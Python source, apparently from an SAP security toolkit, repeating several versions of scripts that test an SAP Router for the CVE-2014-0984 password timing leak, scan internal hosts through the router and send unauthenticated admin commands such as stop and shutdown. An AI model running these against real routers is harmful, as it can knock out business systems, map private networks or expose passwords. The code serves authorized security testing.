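def main():
    """Entry point: probe an SAP Router for the CVE-2014-0984 timing side channel.

    Connects to the router given on the command line, determines the router
    version (unless forced via the command line), and then hands
    ``try_password`` a series of candidate passwords: candidate ``i`` keeps the
    first ``i`` characters of ``options.password`` and pads the rest with
    ``"X"`` to the original length, so the first candidate shares no prefix
    with the real password and the last one is the full password. Each
    candidate is tried ``options.tries`` times and the timing results are
    written to ``options.output``.

    Requires the external ``fau_timer`` library (``has_fau_timer``); that is
    checked before any network activity.

    Security note: every candidate - i.e. a growing prefix of the real
    password - is echoed to stdout, so captured terminal output or logs of a
    run disclose the password. Only run this against systems you are
    authorized to test.

    Returns:
        None. Exits early (after printing a hint) when the timing library is
        missing or the router version could not be determined.
    """
    options = parse_options()

    # Fail fast, before touching the network, if the timing library is absent.
    if not has_fau_timer:
        print("[-] Required library not found. Please install it from https://github.com/seecurity/mona-timing-lib")
        return

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))

    try:
        # Retrieve the router version used by the server if not specified
        if options.router_version is None:
            options.router_version = get_router_version(conn)
    finally:
        # This socket is only needed for the version probe: try_password() does
        # not receive it, so release it here instead of leaking it for the
        # whole run.
        conn.close()

    # get_router_version() may come back empty; "%d" below would then raise.
    if options.router_version is None:
        print("[-] Could not determine the SAP Router version, specify it explicitly")
        return
    print("[*] Using SAP Router version %d" % options.router_version)

    print("[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ...")
    total_len = len(options.password)
    with open(options.output, "w") as f:
        attempt = 0  # running attempt counter handed to try_password()
        for i in range(total_len + 1):
            password = options.password[:i] + "X" * (total_len - i)
            print("[*] Trying with password (%s) len %d" % (password, len(password)))
            for _ in range(options.tries):
                try_password(options, password, f, attempt)
                attempt += 1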
def main():
    """Entry point: find hosts/ports reachable through an SAP Router.

    Asks the router at ``options.remote_host:options.remote_port`` to route to
    every (host, port) pair produced by ``parse_target_hosts`` and prints the
    pairs for which ``route_test`` reports ``"open"``. The router version is
    auto-detected over a short-lived (``keep_alive=False``) connection unless
    given on the command line.

    Note: this enumerates the router's route table/ACL from the outside; only
    run it against routers you are authorized to test.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Connecting to SAP Router %s:%d (talk mode %s)" % (options.remote_host, options.remote_port, options.talk_mode))

    # Retrieve the router version used by the server if not specified
    if options.router_version is None:
        probe = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port, keep_alive=False)
        options.router_version = get_router_version(probe)
        probe.close()
    print("[*] Using SAP Router version %d" % options.router_version)

    # Translate the textual talk mode into the numeric value route_test expects.
    talk_modes = {"raw": 1, "ni": 0}
    options.talk_mode = talk_modes[options.talk_mode]

    open_targets = []
    for host, port in parse_target_hosts(options.target_hosts, options.target_ports):
        status = route_test(options.remote_host, options.remote_port, host, port, options.talk_mode, options.router_version)
        if options.verbose:
            print("[*] Status of %s:%s: %s" % (host, port, status))
        if status == "open":
            open_targets.append((host, port))

    print("[*] Host/Ports found open:")
    for host, port in open_targets:
        print("\tHost: %s\tPort:%s" % (host, port))
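def main():
    """Entry point: find hosts/ports reachable through an SAP Router.

    Uses the router at ``options.remote_host:options.remote_port`` as a pivot
    and asks it to route to every (host, port) pair produced by
    ``parse_target_hosts``; pairs for which ``route_test`` reports ``"open"``
    are listed at the end. Progress goes through ``logging`` (INFO, or DEBUG
    with --verbose). The router version is auto-detected over a short-lived
    connection unless given on the command line.

    Note: this enumerates the router's route table/ACL from the outside; only
    run it against routers you are authorized to test.
    """
    options = parse_options()

    level = logging.DEBUG if options.verbose else logging.INFO
    # The record attribute is "message" (singular). With "%(messages)s" the
    # formatter raised KeyError and every line became a "Logging error".
    logging.basicConfig(level=level, format="%(message)s")

    # Lazy %-args: the original "called" the message string instead of
    # formatting it (missing "%"), which raised TypeError before connecting.
    logging.info("[*]Connecting to SAP Router %s:%d (talk mode %s)",
                 options.remote_host, options.remote_port, options.talk_mode)

    # Retrieve the router version used by the server if not specified
    if options.router_version is None:
        conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port, keep_alive=False)
        try:
            options.router_version = get_router_version(conn)
        finally:
            conn.close()
    if options.router_version is None:
        logging.error("[-] Could not determine the SAP Router version, specify it explicitly")
        return
    logging.info("[*] Using SAP Router Version %d", options.router_version)

    # Map the textual talk mode onto the protocol constants.
    options.talk_mode = {"raw": ROUTER_TALK_MODE_NI_RAW_IO,
                         "ni": ROUTER_TALK_MODE_NI_MSG_IO}[options.talk_mode]

    results = []
    for host, port in parse_target_hosts(options.target_hosts, options.target_ports):
        # Fixed two typos that made this unreachable in practice:
        # "options_port" (NameError) and "options.talk_node" (AttributeError).
        status = route_test(options.remote_host, options.remote_port, host, port,
                            options.talk_mode, options.router_version)
        if options.verbose:
            logging.info("[*] status of %s:%s:%s", host, port, status)
        if status == "open":
            results.append((host, port))

    logging.info("[*] Host?ports found open:")
    for host, port in results:
        logging.info("\thost: %s\tport:%s", host, port)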
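def main():
    """Entry point: probe an SAP Router for the CVE-2014-0984 timing side channel.

    Connects to the router given on the command line, determines the router
    version (unless forced via the command line), and then hands
    ``try_password`` a series of candidate passwords: candidate ``i`` keeps the
    first ``i`` characters of ``options.password`` and pads the rest with
    ``"X"`` to the original length. Each candidate is tried ``options.tries``
    times and the timing results are written to ``options.output``.

    Print calls use the single-argument parenthesized form so the function
    runs unchanged under Python 2 and 3.

    Security note: every candidate - a growing prefix of the real password -
    is echoed to stdout, so captured terminal output discloses the password.
    Only run this against systems you are authorized to test.

    Returns:
        None. Exits early when the router version could not be determined.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))

    try:
        # Retrieve the router version used by the server if not specified
        if options.router_version is None:
            options.router_version = get_router_version(conn)
    finally:
        # Only needed for the version probe: try_password() does not receive
        # this socket, so close it instead of leaking it for the whole run.
        conn.close()

    # get_router_version() may come back empty; "%d" below would then raise.
    if options.router_version is None:
        print("[-] Could not determine the SAP Router version, specify it explicitly")
        return
    print("[*] Using SAP Router version %d" % options.router_version)

    print("[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ...")
    total_len = len(options.password)
    with open(options.output, "w") as f:
        attempt = 0  # running attempt counter handed to try_password()
        for i in range(total_len + 1):
            password = options.password[:i] + "X" * (total_len - i)
            print("[*] Trying with password (%s) len %d" % (password, len(password)))
            for _ in range(options.tries):
                try_password(options, password, f, attempt)
                attempt += 1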
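def _build_admin_request(options):
    """Translate the parsed command-line options into a SAPRouter admin packet.

    Exactly one command option is honoured, in the order tested below.

    Returns:
        tuple: ``(packet, expect_response)`` where ``packet`` is the
        ``SAPRouter`` admin packet to send (``None`` when no command was
        selected) and ``expect_response`` tells the caller whether the router
        is expected to answer.
    """
    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN)
    expect_response = False
    if options.stop:
        p.adm_command = 5
        print("[*] Requesting stop of the remote SAP Router")
    elif options.soft:
        p.adm_command = 9
        print("[*] Requesting a soft shutdown of the remote SAP Router")
        expect_response = True
    elif options.info:
        p.adm_command = 2
        if options.info_password:
            if len(options.info_password) > 19:
                print("[*] Password too long, truncated at 19 characters")
            # NOTE(review): the value is assigned untruncated here; any
            # truncation to 19 characters happens in the packet field - confirm.
            p.adm_password = options.info_password
            # Security: the password is echoed to stdout (and so to any log of
            # the run); prefer --verbose-free runs in shared environments.
            print("[*] Requesting info using password %s" % p.adm_password)
        else:
            print("[*] Requesting info")
        expect_response = True
    elif options.new_route:
        p.adm_command = 3
        print("[*] Requesting a refresh of the router table")
    elif options.trace:
        p.adm_command = 4
        print("[*] Requesting a toggle on the trace settings")
    elif options.cancel:
        p.adm_command = 6
        p.adm_client_ids = list(map(int, options.cancel.split(",")))
        print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    elif options.dump:
        p.adm_command = 7
        print("[*] Requesting a dump of the buffers")
    elif options.flush:
        p.adm_command = 8
        print("[*] Requesting a flush of the buffers")
    elif options.hide:
        p.adm_command = 14
        print("[*] Requesting a hide on the errors to clients")
        expect_response = True
    elif options.set_peer:
        p.adm_command = 10
        p.adm_address_mask = options.set_peer
        print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.clear_peer:
        p.adm_command = 11
        p.adm_address_mask = options.clear_peer
        print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.trace_conn:
        p.adm_command = 12
        p.adm_client_ids = list(map(int, options.trace_conn.split(",")))
        print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    else:
        print("[*] No command specified !")
        return None, False
    return p, expect_response


def _print_info_response(conn, raw_response):
    """Decode and print the two-packet reply to an info (command 2) request.

    Args:
        conn: the open ``SAPNIStreamSocket``; the second packet is read from it.
        raw_response: the first packet already received, decoded here as a
            ``SAPRouterInfoClients`` list.
    """
    # Decode the first packet as a list of info client
    raw_response.decode_payload_as(SAPRouterInfoClients)
    clients = ["\t".join(["ID", "Client", "Partner", "Service", "Connected on"]), "-" * 60]
    for client in raw_response.clients:
        # If the trace flag is set, add a mark
        flag = "(*)" if client.flag_traced else "(+)" if client.flag_routed else ""
        fields = [
            str(client.id),
            client.address,
            "%s%s" % (flag, client.partner) if client.flag_routed else "(no partner)",
            client.service if client.flag_routed else "",
            # Local time of this host, not the router's timezone.
            datetime.fromtimestamp(client.connected_on).ctime(),
        ]
        clients.append("\t".join(fields))

    # Decode the second packet as server info
    raw_response = conn.recv()
    raw_response.decode_payload_as(SAPRouterInfoServer)
    print("SAP Network Interface Router running on port %d (PID = %d)\n"
          "Started on: %s\n"
          "Parent process: PID = %d, port = %d\n"
          % (raw_response.port, raw_response.pid,
             datetime.fromtimestamp(raw_response.started_on).ctime(),
             raw_response.ppid, raw_response.pport))
    print("\n".join(clients))
    print("(*) Connections being traced")


def _handle_admin_response(conn, options):
    """Read the router's reply to an admin request and print it.

    Errors are printed (packet dump with --verbose, error text otherwise);
    otherwise the reply is printed, info replies in decoded form, followed by
    any further raw packets until the router closes the connection.
    """
    # Some responses has no SAPRouter's packet format and are raw strings,
    # we need to get the SAP NI layer first and then check if we could go
    # down to the SAPRouter layer.
    raw_response = conn.recv()[SAPNI]
    if SAPRouter in raw_response:
        router_response = raw_response[SAPRouter]
    # If the response was null, just return
    elif raw_response.length == 0:
        return
    else:
        # Non-empty reply without a SAPRouter layer: treat it as raw data.
        # Previously this path fell through with router_response unbound and
        # crashed with NameError on the error check below.
        router_response = None

    # If the response is an error, print and exit
    if router_response is not None and router_is_error(router_response):
        print("[*] Error requesting info:")
        if options.verbose:
            router_response.show2()
        else:
            print(router_response.err_text_value.error)
        return

    # Otherwise, print the packets sent by the SAP Router
    print("[*] Response:\n")
    if options.info:
        _print_info_response(conn, raw_response)

    # Show the plain packets returned. The router closing the connection is
    # the normal way out of this loop ("error" is presumably socket.error).
    try:
        raw_response = conn.recv()
        while raw_response:
            print(raw_response.payload)
            raw_response = conn.recv()
    except error:
        pass


def main():
    """Entry point: send one administrative command to a remote SAP Router.

    Builds the admin packet from the command-line options, connects to the
    router, fills in the router version (given or auto-detected), sends the
    packet and, for commands that answer, prints the reply.

    Security note: several of these commands are disruptive - stop (5), soft
    shutdown (9), cancelling routes (6), toggling traces (4) - and no
    credential other than the optional info password is sent with them. Only
    run this against routers you are authorized to administer.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    p, expect_response = _build_admin_request(options)
    if p is None:
        return

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))
    try:
        # Retrieve the router version used by the server if not specified
        if options.router_version:
            p.version = options.router_version
        else:
            # get_router_version() may come back empty; keep the packet default then.
            p.version = get_router_version(conn) or p.version
        print("[*] Using SAP Router version %d" % p.version)

        # Send the router admin request
        print("[*] Sending Router Admin packet")
        if options.verbose:
            p.show2()
        conn.send(p)

        # Grab the response if required
        if expect_response:
            _handle_admin_response(conn, options)
    finally:
        conn.close()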
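def _build_admin_request(options):
    """Translate the parsed command-line options into a SAPRouter admin packet.

    Exactly one command option is honoured, in the order tested below.

    Returns:
        tuple: ``(packet, expect_response)`` where ``packet`` is the
        ``SAPRouter`` admin packet to send (``None`` when no command was
        selected) and ``expect_response`` tells the caller whether the router
        is expected to answer.
    """
    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN)
    expect_response = False
    if options.stop:
        p.adm_command = 5
        print("[*] Requesting stop of the remote SAP Router")
    elif options.soft:
        p.adm_command = 9
        print("[*] Requesting a soft shutdown of the remote SAP Router")
        expect_response = True
    elif options.info:
        p.adm_command = 2
        if options.info_password:
            if len(options.info_password) > 19:
                print("[*] Password too long, truncated at 19 characters")
            # NOTE(review): the value is assigned untruncated here; any
            # truncation to 19 characters happens in the packet field - confirm.
            p.adm_password = options.info_password
            # Security: the password is echoed to stdout (and so to any log of
            # the run).
            print("[*] Requesting info using password %s" % p.adm_password)
        else:
            print("[*] Requesting info")
        expect_response = True
    elif options.new_route:
        p.adm_command = 3
        print("[*] Requesting a refresh of the router table")
    elif options.trace:
        p.adm_command = 4
        print("[*] Requesting a toggle on the trace settings")
    elif options.cancel:
        p.adm_command = 6
        p.adm_client_ids = list(map(int, options.cancel.split(",")))
        print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    elif options.dump:
        p.adm_command = 7
        print("[*] Requesting a dump of the buffers")
    elif options.flush:
        p.adm_command = 8
        print("[*] Requesting a flush of the buffers")
    elif options.hide:
        p.adm_command = 14
        print("[*] Requesting a hide on the errors to clients")
        expect_response = True
    elif options.set_peer:
        p.adm_command = 10
        p.adm_address_mask = options.set_peer
        print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.clear_peer:
        p.adm_command = 11
        p.adm_address_mask = options.clear_peer
        print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.trace_conn:
        p.adm_command = 12
        p.adm_client_ids = list(map(int, options.trace_conn.split(",")))
        print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    else:
        print("[*] No command specified !")
        return None, False
    return p, expect_response


def _print_info_response(conn, raw_response):
    """Decode and print the two-packet reply to an info (command 2) request.

    Args:
        conn: the open ``SAPNIStreamSocket``; the second packet is read from it.
        raw_response: the first packet already received, decoded here as a
            ``SAPRouterInfoClients`` list.
    """
    # Decode the first packet as a list of info client
    raw_response.decode_payload_as(SAPRouterInfoClients)
    clients = ["\t".join(["ID", "Client", "Partner", "Service", "Connected on"]), "-" * 60]
    for client in raw_response.clients:
        # If the trace flag is set, add a mark
        flag = "(*)" if client.flag_traced else "(+)" if client.flag_routed else ""
        fields = [
            str(client.id),
            client.address,
            "%s%s" % (flag, client.partner) if client.flag_routed else "(no partner)",
            client.service if client.flag_routed else "",
            # Local time of this host, not the router's timezone.
            datetime.fromtimestamp(client.connected_on).ctime(),
        ]
        clients.append("\t".join(fields))

    # Decode the second packet as server info
    raw_response = conn.recv()
    raw_response.decode_payload_as(SAPRouterInfoServer)
    print("SAP Network Interface Router running on port %d (PID = %d)\n"
          "Started on: %s\n"
          "Parent process: PID = %d, port = %d\n"
          % (raw_response.port, raw_response.pid,
             datetime.fromtimestamp(raw_response.started_on).ctime(),
             raw_response.ppid, raw_response.pport))
    print("\n".join(clients))
    print("(*) Connections being traced")


def _handle_admin_response(conn, options):
    """Read the router's reply to an admin request and print it.

    Errors are printed (packet dump with --verbose, error text otherwise);
    otherwise the reply is printed, info replies in decoded form, followed by
    any further raw packets until the router closes the connection.
    """
    # Some responses has no SAPRouter's packet format and are raw strings,
    # we need to get the SAP NI layer first and then check if we could go
    # down to the SAPRouter layer.
    raw_response = conn.recv()[SAPNI]
    if SAPRouter in raw_response:
        router_response = raw_response[SAPRouter]
    # If the response was null, just return
    elif raw_response.length == 0:
        return
    else:
        # Non-empty reply without a SAPRouter layer: treat it as raw data.
        # Previously this path fell through with router_response unbound and
        # crashed with NameError on the error check below.
        router_response = None

    # If the response is an error, print and exit
    if router_response is not None and router_is_error(router_response):
        print("[*] Error requesting info:")
        if options.verbose:
            router_response.show2()
        else:
            print(router_response.err_text_value.error)
        return

    # Otherwise, print the packets sent by the SAP Router
    print("[*] Response:\n")
    if options.info:
        _print_info_response(conn, raw_response)

    # Show the plain packets returned. The router closing the connection is
    # the normal way out of this loop ("error" is presumably socket.error).
    try:
        raw_response = conn.recv()
        while raw_response:
            print(raw_response.payload)
            raw_response = conn.recv()
    except error:
        pass


def main():
    """Entry point: send one administrative command to a remote SAP Router.

    Builds the admin packet from the command-line options, connects to the
    router, fills in the router version (given or auto-detected), sends the
    packet and, for commands that answer, prints the reply.

    Security note: several of these commands are disruptive - stop (5), soft
    shutdown (9), cancelling routes (6), toggling traces (4) - and no
    credential other than the optional info password is sent with them. Only
    run this against routers you are authorized to administer.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    p, expect_response = _build_admin_request(options)
    if p is None:
        return

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))
    try:
        # Retrieve the router version used by the server if not specified
        if options.router_version:
            p.version = options.router_version
        else:
            # get_router_version() may come back empty; keep the packet default then.
            p.version = get_router_version(conn) or p.version
        print("[*] Using SAP Router version %d" % p.version)

        # Send the router admin request
        print("[*] Sending Router Admin packet")
        if options.verbose:
            p.show2()
        conn.send(p)

        # Grab the response if required
        if expect_response:
            _handle_admin_response(conn, options)
    finally:
        conn.close()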
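def main():
    """Entry point: send one administrative command to a remote SAP Router.

    Builds the admin packet from the command-line options (exactly one command
    is honoured, in the order tested below), connects to the router, fills in
    the router version (given or auto-detected), sends the packet and, for
    commands that answer, prints the reply.

    Print calls use the single-argument parenthesized form and ``list(map())``
    so the function behaves the same under Python 2 and 3.

    Security note: several of these commands are disruptive - stop (5), soft
    shutdown (9), cancelling routes (6), toggling traces (4) - and no
    credential other than the optional info password is sent with them; that
    password is echoed to stdout. Only run this against routers you are
    authorized to administer.
    """
    options = parse_options()
    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # "expect_response" replaces the old "response" flag, which was later
    # re-bound to the received packet and made the flow hard to follow.
    expect_response = False
    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN)
    if options.stop:
        p.adm_command = 5
        print("[*] Requesting stop of the remote SAP Router")
    elif options.soft:
        p.adm_command = 9
        print("[*] Requesting a soft shutdown of the remote SAP Router")
        expect_response = True
    elif options.info:
        p.adm_command = 2
        if options.info_password:
            if len(options.info_password) > 19:
                print("[*] Password too long, truncated at 19 characters")
            # NOTE(review): assigned untruncated; any truncation to 19
            # characters happens in the packet field - confirm.
            p.adm_password = options.info_password
            print("[*] Requesting info using password %s" % p.adm_password)
        else:
            print("[*] Requesting info")
        expect_response = True
    elif options.new_route:
        p.adm_command = 3
        print("[*] Requesting a refresh of the router table")
    elif options.trace:
        p.adm_command = 4
        print("[*] Requesting a toggle on the trace settings")
    elif options.cancel:
        p.adm_command = 6
        p.adm_client_ids = list(map(int, options.cancel.split(",")))
        print("[*] Requesting a cancel of the route(s) with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    elif options.dump:
        p.adm_command = 7
        print("[*] Requesting a dump of the buffers")
    elif options.flush:
        p.adm_command = 8
        print("[*] Requesting a flush of the buffers")
    elif options.hide:
        p.adm_command = 14
        print("[*] Requesting a hide on the errors to clients")
        expect_response = True
    elif options.set_peer:
        p.adm_command = 10
        p.adm_address_mask = options.set_peer
        print("[*] Request a set peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.clear_peer:
        p.adm_command = 11
        p.adm_address_mask = options.clear_peer
        print("[*] Request a clear peer trace for the address mask %s" % p.adm_address_mask)
        expect_response = True
    elif options.trace_conn:
        p.adm_command = 12
        p.adm_client_ids = list(map(int, options.trace_conn.split(",")))
        print("[*] Requesting a connection trace with client id(s) %s" % p.adm_client_ids)
        expect_response = True
    else:
        print("[*] No command specified !")
        return

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))
    try:
        # Retrieve the router version used by the server if not specified
        if options.router_version:
            p.version = options.router_version
        else:
            # get_router_version() may come back empty; keep the packet default then.
            p.version = get_router_version(conn) or p.version
        print("[*] Using SAP Router version %d" % p.version)

        # Send the router admin request
        print("[*] Sending Router Admin packet")
        if options.verbose:
            p.show2()
        conn.send(p)

        # Grab the response if required
        if expect_response:
            # Some responses has no SAPRouter's packet format and are raw strings,
            # we need to get the SAP NI layer first and then check if we could go
            # down to the SAPRouter layer.
            reply = conn.recv()[SAPNI]
            if SAPRouter in reply and reply[SAPRouter].payload:
                reply = reply[SAPRouter]

            # If the response is an error, print and exit
            if router_is_error(reply):
                print("[*] Error requesting info:")
                if options.verbose:
                    reply.show2()
                else:
                    print(reply.err_text_value)
            # Otherwise, print all the packets sent by the SAP Router
            else:
                print("[*] Response:")
                try:
                    while reply:
                        print(reply.payload)
                        reply = conn.recv()
                except Exception:
                    # The router closing the connection (a socket error on
                    # recv) is the normal way out of this loop. Narrowed from
                    # a bare "except:" so Ctrl-C and SystemExit still work.
                    pass
    finally:
        conn.close()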